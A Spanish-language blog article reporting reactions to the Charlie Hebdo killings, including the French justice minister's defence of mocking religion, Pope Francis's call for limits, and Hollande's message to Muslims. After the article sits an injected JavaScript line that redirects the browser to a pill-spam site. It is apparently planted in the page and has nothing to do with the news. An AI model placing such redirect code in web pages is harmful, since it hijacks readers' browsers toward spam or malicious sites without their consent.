Ministra de Justicia: «En Francia tenemos derecho a burlarnos de cualquier religión»

París, Francia.
En Francia «se puede dibujar todo, incluso un profeta», afirmó el jueves la ministra francesa de Justicia, Christiane Taubira, que asistía a los funerales de uno de los dibujantes asesinados en el ataque al semanario Charlie Hebdo.
«Se puede dibujar todo, incluso un profeta, porque en Francia, el país de Voltaire y de la irreverencia, tenemos el derecho de burlarnos de todas las religiones», dijo la ministra.
La representante de Justicia asistía a los funerales del dibujante Tignous, uno de los miembros de la redacción de Charlie Hebdo asesinados la semana pasada, que se realizaron en la alcaldía de Montreuil (periferia de París).
Lea más: Papa Francisco sobre Charlie Hebdo: «No se puede insultar la religión de los demás»
El debate mundial por el límite de la exigida libertad de expresión se enciende al encontrarse posiciones encontradas de los líderes de la comunidad internacional sobre el mismo.
El Papa no es Charlie
La publicación de la revista Charlie Hebdo con una nueva portada sobre Mahoma, siguió generando rechazo en el mundo islámico y el papa Francisco se sumó al ruedo del debate al afirmar que «la libertad de expresión» no da derecho a «insultar» la religión del prójimo.
El Papa Francisco brindó una conferencia de prensa en se refirió al ataque terrorista contra Charlie Hebdo, durante su vuelo hacia Filipinas.
Bergoglio dijo:»Tenemos la obligación de hablar abiertamente, de tener esta libertad, pero sin ofender».
«Es verdad que no se puede reaccionar violentamente, pero si Gasbarri (el Papa aludió a uno de sus colaboradores junto a él en el avión), gran amigo, dice una mala palabra de mi mamá, puede esperarse un puñetazo. ¡Es normal!», aseguró.
Entretanto, el presidente francén Francois Hollande eligió como lugar para dirigir un mensaje conciliador a los musulmanes la moderna sede del Instituto del Mundo Árabe de París, a orillas del Sena, que también proclamó en su fachada «Yo soy Charlie» tras los ataques de la semana pasada que dejaron 17 muertos.
«Los musulmanes son las primeras víctimas del fanatismo, el fundamentalismo y la intolerancia. Quiero que las personas que profesan esa religión y que viven en Francia, puedan sentirse unidos, protegidos, respetados de la misma forma que ellos deben respetar a la República», señaló Hollande en su discurso.
El ataque a Charlie Hebdo fue reivindicado el miércoles por Al Qaida en Yemen, que dijo que la acción tuvo como objetivo «vengar» a Mahoma.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *